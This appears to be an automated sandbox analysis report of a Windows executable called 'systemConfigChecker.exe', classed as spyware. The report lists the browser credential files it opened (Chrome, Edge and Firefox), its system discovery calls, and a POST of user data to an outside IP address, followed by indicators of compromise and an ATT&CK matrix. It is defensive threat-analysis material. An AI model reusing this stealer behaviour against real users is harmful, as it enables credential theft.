Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
systemConfigChecker.exe

Overview

General Information

Sample name:systemConfigChecker.exe
Analysis ID:1569875
MD5:218954f9dd70247e51af8a30940d5c33
SHA1:35ee01d3128951c3993079186fddc9c0dbe155f7
SHA256:95ec35703d323fe972a936d9b3574bb191e94b693656d94149897c5ff35f225f
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious sample
Contains functionality to steal Chrome passwords or cookies
Tries to harvest and steal browser information (history, passwords, etc)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to enumerate network shares
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Detected potential crypto function
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries information about the installed CPU (vendor, model number etc)

Classification

  • System is w10x64
  • systemConfigChecker.exe (PID: 6176 cmdline: "C:\Users\user\Desktop\systemConfigChecker.exe" MD5: 218954F9DD70247E51AF8A30940D5C33)
    • conhost.exe (PID: 5940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
Source: systemConfigChecker.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: F:\systemConfigChecker\x64\Release\systemConfigChecker.pdb(( source: systemConfigChecker.exe
Source: Binary string: F:\systemConfigChecker\x64\Release\systemConfigChecker.pdb source: systemConfigChecker.exe
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: 0_2_00007FF6B2703CD0 memset,NetUserEnum,NetApiBufferFree,_invalid_parameter_noinfo_noreturn,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,0_2_00007FF6B2703CD0
Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: WinHTTP/1.0Host: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: unknownHTTP traffic detected: POST /userdata HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WebKitFormBoundaryUser-Agent: WinHTTP/1.0Content-Length: 96727Host: 185.237.165.97
Source: systemConfigChecker.exe, 00000000.00000002.1576343890.0000016BD01D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97/
Source: systemConfigChecker.exe, 00000000.00000002.1576343890.0000016BD01D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97/twO
Source: systemConfigChecker.exe, 00000000.00000002.1576343890.0000016BD01F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97/usdrdata
Source: systemConfigChecker.exe, 00000000.00000002.1576343890.0000016BD01F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97/usdrdata_
Source: systemConfigChecker.exe, 00000000.00000003.1280544209.0000016BD01F5000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.1307992622.0000016BD01F4000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000002.1576343890.0000016BD01D7000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.1280544209.0000016BD01D7000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000002.1576343890.0000016BD01F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97/userdata
Source: systemConfigChecker.exe, 00000000.00000003.1280544209.0000016BD01F5000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.1307992622.0000016BD01F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97/userdata_
Source: systemConfigChecker.exe, 00000000.00000002.1576343890.0000016BD01C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97:80/userdata
Source: systemConfigChecker.exe, 00000000.00000002.1576343890.0000016BD019C000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000002.1576343890.0000016BD01D7000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.1280544209.0000016BD01D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
Source: systemConfigChecker.exe, 00000000.00000003.1280544209.0000016BD01C8000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.1276079294.0000016BD01C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org:80/
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: 0_2_00007FF6B2705D800_2_00007FF6B2705D80
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: 0_2_00007FF6B2701B500_2_00007FF6B2701B50
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: 0_2_00007FF6B2704E500_2_00007FF6B2704E50
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: 0_2_00007FF6B2704A400_2_00007FF6B2704A40
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: 0_2_00007FF6B27055100_2_00007FF6B2705510
Source: classification engineClassification label: mal52.spyw.winEXE@2/1@1/2
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: 0_2_00007FF6B2703780 GetLogicalDrives,memset,GetDiskFreeSpaceExA,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,0_2_00007FF6B2703780
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5940:120:WilError_03
Source: systemConfigChecker.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\systemConfigChecker.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: systemConfigChecker.exe, 00000000.00000003.1281009929.0000016BD0254000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.1281170793.0000016BD0224000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.1281009929.0000016BD0239000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.1280743765.0000016BD0218000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.1280743765.0000016BD022E000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.1280468321.0000016BD0223000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.1281009929.0000016BD024A000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.1281305566.0000016BD0217000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: unknownProcess created: C:\Users\user\Desktop\systemConfigChecker.exe "C:\Users\user\Desktop\systemConfigChecker.exe"
Source: C:\Users\user\Desktop\systemConfigChecker.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: samcli.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: samlib.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeSection loaded: kernel.appcore.dllJump to behavior
Source: systemConfigChecker.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: systemConfigChecker.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: systemConfigChecker.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: systemConfigChecker.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: systemConfigChecker.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: systemConfigChecker.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: systemConfigChecker.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: systemConfigChecker.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: systemConfigChecker.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: F:\systemConfigChecker\x64\Release\systemConfigChecker.pdb(( source: systemConfigChecker.exe
Source: Binary string: F:\systemConfigChecker\x64\Release\systemConfigChecker.pdb source: systemConfigChecker.exe
Source: systemConfigChecker.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: systemConfigChecker.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: systemConfigChecker.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: systemConfigChecker.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: systemConfigChecker.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: malloc,memset,GetAdaptersInfo,malloc,GetAdaptersInfo,free,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,0_2_00007FF6B2703AA0
Source: C:\Users\user\Desktop\systemConfigChecker.exe TID: 4048Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: 0_2_00007FF6B2703560 GetSystemInfo,memset,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@G@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,0_2_00007FF6B2703560
Source: systemConfigChecker.exe, 00000000.00000003.1307992622.0000016BD0206000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.1275980221.0000016BD0206000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000002.1576343890.0000016BD019C000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000002.1576343890.0000016BD0206000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.1280544209.0000016BD0206000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\systemConfigChecker.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: 0_2_00007FF6B270BFAC IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6B270BFAC
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: 0_2_00007FF6B270C150 SetUnhandledExceptionFilter,0_2_00007FF6B270C150
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: 0_2_00007FF6B270BFAC IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6B270BFAC
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: 0_2_00007FF6B270BB00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6B270BB00
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: GetLocaleInfoA,GetLocaleInfoA,memset,??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ,??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z,??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ,??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6B2704640
Source: C:\Users\user\Desktop\systemConfigChecker.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: 0_2_00007FF6B270C1BC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF6B270C1BC
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: 0_2_00007FF6B2704180 GetTimeZoneInformation,memset,_invalid_parameter_noinfo_noreturn,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,0_2_00007FF6B2704180

Stealing of Sensitive Information

barindex
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data0_2_00007FF6B2705510
Source: C:\Users\user\Desktop\systemConfigChecker.exeCode function: \AppData\Local\Chromium\User Data\Default\Login Data0_2_00007FF6B2705510
Source: C:\Users\user\Desktop\systemConfigChecker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\y572q81e.default\times.jsonJump to behavior
Source: C:\Users\user\Desktop\systemConfigChecker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
Process Injection
1
Virtualization/Sandbox Evasion
2
OS Credential Dumping
1
Network Share Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Process Injection
1
Credentials In Files
2
System Time Discovery
Remote Desktop Protocol1
Data from Local System
1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
DLL Side-Loading
Security Account Manager11
Security Software Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS1
Virtualization/Sandbox Evasion
Distributed Component Object ModelInput Capture3
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
Process Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials2
System Network Configuration Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync25
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://185.237.165.97/usdrdata0%Avira URL Cloudsafe
http://185.237.165.97/userdata0%Avira URL Cloudsafe
http://185.237.165.97/twO0%Avira URL Cloudsafe
http://185.237.165.97:80/userdata0%Avira URL Cloudsafe
http://185.237.165.97/userdata_0%Avira URL Cloudsafe
http://185.237.165.97/0%Avira URL Cloudsafe
http://185.237.165.97/usdrdata_0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
api.ipify.org
172.67.74.152
truefalse
    high
    NameSourceMaliciousAntivirus DetectionReputation
    http://api.ipify.org/systemConfigChecker.exe, 00000000.00000002.1576343890.0000016BD019C000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000002.1576343890.0000016BD01D7000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.1280544209.0000016BD01D7000.00000004.00000020.00020000.00000000.sdmpfalse
      high
      http://185.237.165.97/usdrdatasystemConfigChecker.exe, 00000000.00000002.1576343890.0000016BD01F4000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://185.237.165.97/userdata_systemConfigChecker.exe, 00000000.00000003.1280544209.0000016BD01F5000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.1307992622.0000016BD01F4000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://185.237.165.97:80/userdatasystemConfigChecker.exe, 00000000.00000002.1576343890.0000016BD01C8000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://185.237.165.97/twOsystemConfigChecker.exe, 00000000.00000002.1576343890.0000016BD01D7000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://api.ipify.org:80/systemConfigChecker.exe, 00000000.00000003.1280544209.0000016BD01C8000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.1276079294.0000016BD01C8000.00000004.00000020.00020000.00000000.sdmpfalse
        high
        http://185.237.165.97/systemConfigChecker.exe, 00000000.00000002.1576343890.0000016BD01D7000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://185.237.165.97/userdatasystemConfigChecker.exe, 00000000.00000003.1280544209.0000016BD01F5000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.1307992622.0000016BD01F4000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000002.1576343890.0000016BD01D7000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000003.1280544209.0000016BD01D7000.00000004.00000020.00020000.00000000.sdmp, systemConfigChecker.exe, 00000000.00000002.1576343890.0000016BD01F4000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://185.237.165.97/usdrdata_systemConfigChecker.exe, 00000000.00000002.1576343890.0000016BD01F4000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        185.237.165.97
        unknownFrance
        52195AP-MEDIA-ASPLfalse
        172.67.74.152
        api.ipify.orgUnited States
        13335CLOUDFLARENETUSfalse
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1569875
        Start date and time:2024-12-06 10:57:52 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 5m 13s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Run name:Run with higher sleep bypass
        Number of analysed new started processes analysed:14
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:systemConfigChecker.exe
        Detection:MAL
        Classification:mal52.spyw.winEXE@2/1@1/2
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 31
        • Number of non-executed functions: 17
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
        • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtReadVirtualMemory calls found.
        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        • VT rate limit hit for: systemConfigChecker.exe
        No simulations
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        172.67.74.1522b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
        • api.ipify.org/
        Zc9eO57fgF.elfGet hashmaliciousUnknownBrowse
        • api.ipify.org/
        67065b4c84713_Javiles.exeGet hashmaliciousRDPWrap ToolBrowse
        • api.ipify.org/
        Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
        • api.ipify.org/
        4F08j2Rmd9.binGet hashmaliciousXmrigBrowse
        • api.ipify.org/
        y8tCHz7CwC.binGet hashmaliciousXmrigBrowse
        • api.ipify.org/
        file.exeGet hashmaliciousUnknownBrowse
        • api.ipify.org/
        file.exeGet hashmaliciousUnknownBrowse
        • api.ipify.org/
        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
        • api.ipify.org/
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        api.ipify.orgkYGxoN4JVW.batGet hashmaliciousUnknownBrowse
        • 172.67.74.152
        REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeGet hashmaliciousAgentTeslaBrowse
        • 104.26.13.205
        PO54782322024.exeGet hashmaliciousAgentTeslaBrowse
        • 172.67.74.152
        https://assets-gbr.mkt.dynamics.com/cc57758b-ada1-ef11-8a64-000d3a872ba0/digitalassets/standaloneforms/7608c709-85a2-ef11-8a69-7c1e5279b2ddGet hashmaliciousEvilProxy, HTMLPhisherBrowse
        • 104.26.13.205
        https://url.us.m.mimecastprotect.com/s/tWC_CNkXmJcoqkvlsmfBIyQP6j?domain=assets-gbr.mkt.dynamics.comGet hashmaliciousEvilProxy, HTMLPhisherBrowse
        • 104.26.13.205
        lC7L7oBBMC.exeGet hashmaliciousAgentTeslaBrowse
        • 104.26.13.205
        0wxckB4Iba.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
        • 172.67.74.152
        OHScaqAPjt.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
        • 172.67.74.152
        8JuGuaUaZP.exeGet hashmaliciousAgentTeslaBrowse
        • 104.26.13.205
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        AP-MEDIA-ASPLx86.elfGet hashmaliciousMirai, MoobotBrowse
        • 46.149.221.180
        file.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
        • 185.237.165.180
        pjczQr2H3P.exeGet hashmaliciousSocks5SystemzBrowse
        • 185.237.165.53
        9TSh73ulR1.exeGet hashmaliciousSocks5SystemzBrowse
        • 185.237.165.53
        0o37tv6BhU.elfGet hashmaliciousMiraiBrowse
        • 46.149.221.189
        YZfB2vyTrR.elfGet hashmaliciousMiraiBrowse
        • 46.149.221.169
        pSWP8vqTi4.elfGet hashmaliciousMirai, MoobotBrowse
        • 46.149.221.178
        ISd7zpfQxZ.elfGet hashmaliciousMiraiBrowse
        • 46.149.221.177
        o6Khx92Ipk.elfGet hashmaliciousMiraiBrowse
        • 46.149.221.156
        CLOUDFLARENETUSfile.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
        • 172.67.165.166
